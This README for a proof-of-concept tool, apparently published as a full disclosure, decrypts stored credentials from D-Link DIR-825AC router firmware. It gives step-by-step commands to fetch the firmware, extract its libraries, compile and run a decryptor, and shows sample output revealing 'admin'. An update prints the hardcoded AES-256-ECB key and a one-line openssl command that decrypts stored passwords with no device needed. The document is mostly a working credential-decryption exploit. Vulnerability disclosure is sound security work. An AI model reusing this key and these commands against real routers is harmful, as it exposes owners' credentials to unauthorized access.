full-disclosure/FDEU-CVE-2021-525A
FDEU-CVE-2021-525A

Proof-of-concept tool for decrypting stored D-Link credentials.

Prerequisites

1. Download the OpenWrt binary toolchain:

   ```shell
   wget http://archive.openwrt.org/chaos_calmer/15.05.1/malta/be/OpenWrt-SDK-15.05.1-malta-be_gcc-4.8-linaro_uClibc-0.9.33.2.Linux-x86_64.tar.bz2 -O openwrt.tar.bz2
   ```

2. Extract the toolchain:

   ```shell
   tar xvf openwrt.tar.bz2
   mv OpenWrt-SDK-15.05.1-malta-be_gcc-4.8-linaro_uClibc-0.9.33.2.Linux-x86_64 openwrt
   ```

3. Download the D-Link firmware:

   ```shell
   wget https://ftp.dlink.ru/pub/Router/DIR-825_AC_E1A/Firmware/2019.09.11-17.44_DIR_825AC_G1A_3.0.6_release.bin -O firmware.bin
   ```

4. Install binwalk:

   ```shell
   sudo apt-get install binwalk
   ```

5. Extract the firmware:

   ```shell
   binwalk -e firmware.bin
   ```

6. Pull the D-Link decryption libraries out of the extracted filesystem:

   ```shell
   cp _firmware.bin.extracted/libaes-gpl.so .
   cp _firmware.bin.extracted/libdhal.so .
   cp _firmware.bin.extracted/libmd5-rfc.so .
   cp _firmware.bin.extracted/libmtd.so .
   cp _firmware.bin.extracted/liblogger.so.2.0.2 liblogger.so.2.0
   cp _firmware.bin.extracted/libjansson_tools.so .
   cp _firmware.bin.extracted/libmnl.so.0.1.0 libmnl.so.0
   cp _firmware.bin.extracted/libhwdata.so .
   cp _firmware.bin.extracted/libnvram.so .
   cp _firmware.bin.extracted/librlx_wifi_mibs.so .
   cp _firmware.bin.extracted/libjansson.so.4.9.0 libjansson.so.4
   ```

7. Install qemu-user-static (the MIPS libraries are run under user-mode emulation):

   ```shell
   sudo apt-get install qemu-user-static
   ```

Compile

Run the provided compilation script (the `STAGING_DIR` and `gethostby*` warnings are expected and harmless):

```shell
./compile.sh
mips-openwrt-linux-gcc: warning: environment variable 'STAGING_DIR' not defined
mips-openwrt-linux-gcc: warning: environment variable 'STAGING_DIR' not defined
mips-openwrt-linux-gcc: warning: environment variable 'STAGING_DIR' not defined
./libdhal.so: warning: gethostbyaddr is obsolescent, use getaddrinfo() instead.
./libdhal.so: warning: gethostbyname is obsolescent, use getnameinfo() instead.
```

Decrypt

```shell
./decrypt.sh 96f6e6cab3c87a5c5c419aa7208711f6
./decrypt: cache '/etc/ld.so.cache' is corrupt
Decrypted: admin
```

Encryption algorithm

UPDATE 2021-11-17

Thanks to an anonymous GitHub user who reverse engineered the encryption algorithm and sent us the key:

- Algorithm: AES in ECB mode (no IV)
- Key length: 256 bits
- Key (hex): `47456e20521d432100090065250000524c2f000020004d000765001f00096b02`

Because the key is hardcoded in the firmware and ECB is deterministic, the stored credentials can be decrypted without the device's libraries at all.

Example:

```shell
echo -n 92f000a7fdc6857fddfb67912ae1f15800000000000000000000000000000000 | \
xxd -r -p | \
openssl enc -d -aes-256-ecb -K 47456e20521d432100090065250000524c2f000020004d000765001f00096b02
```